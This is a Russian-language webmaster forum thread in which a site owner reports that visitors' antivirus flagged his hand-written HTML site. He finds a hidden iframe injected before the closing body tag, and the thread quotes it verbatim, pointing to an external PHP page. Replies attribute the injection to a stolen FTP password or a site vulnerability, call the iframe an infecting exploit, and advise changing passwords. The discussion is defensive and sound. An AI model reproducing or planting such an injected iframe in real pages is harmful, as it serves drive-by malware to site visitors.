Взлом сайта или что-то другое?

P5
На сайте с 27.02.2007
Offline
63
474

Со вчерашнего дня посетители сайта начали жаловаться на то, что при заходе на главную начинает верещать Аваст. Поскольку таких жалоб было немного, решил, что, возможно, он так реагирует на рекламные блоки. Сегодня опять жалоба. Полез проверять код. Сайт на html, все пишется руками. В самом низу, перед тегом </body> нахожу вот такую строчку:

<div style="visibility:hidden"><iframe src="http://poisongo.com/white/voli9x1.php" width=100 height=80></iframe>

Как она туда попала? Получается, пароль на FTP отломали? Перезалил страницу - все нормально. Как уберечься от подобных инцидентов?

planetapokera
На сайте с 08.02.2009
Offline
169
#1

ftp скорее всего утащили у вас.. троянов не ловить - так и уберечься можно..

Comm
На сайте с 12.02.2008
Offline
70
#2
Pavlo58:
..Как уберечься от подобных инцидентов?

Не храните пароли в FTP клиентах, никогда...

Чтобы творить великие дела, нужно жить, как будто ты бессмертен...
alexandr_nv
На сайте с 23.04.2009
Offline
39
#3
Pavlo58:
Как она туда попала? Получается, пароль на FTP отломали? Перезалил страницу - все нормально. Как уберечься от подобных инцидентов?

В iframe прописан сплойт, который заражает посетителей вирусами.

Взломать могли как угодно, возможно через уязвимость сайта.

Ждите ещё пакости... На этом не закончится, если у "злоумышленников" остался ещё доступ к сайту.

alexandr_nv добавил 25.06.2010 в 10:32

И для начала смените пароль от ftp (если, действительно, его украли)

P5
На сайте с 27.02.2007
Offline
63
#4

А смысл вставки этого кода? Пошел по ссылке в коде на главную - там редирект вообще на какую-то хрень...

Пароль сменил сразу же...

Inet-Ark
На сайте с 19.05.2010
Offline
43
#5
Pavlo58:
А смысл вставки этого кода? Пошел по ссылке в коде на главную - там редирект вообще на какую-то хрень...

Вот ответ:

alexandr_nv:
В iframe прописан сплойт, который заражает посетителей вирусами.
MMO-игры и все, что с ними связано (http://gama.su/). Мой сайт с партнерскими программами — мало, но все надежные (http://best-pp.ru/).

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий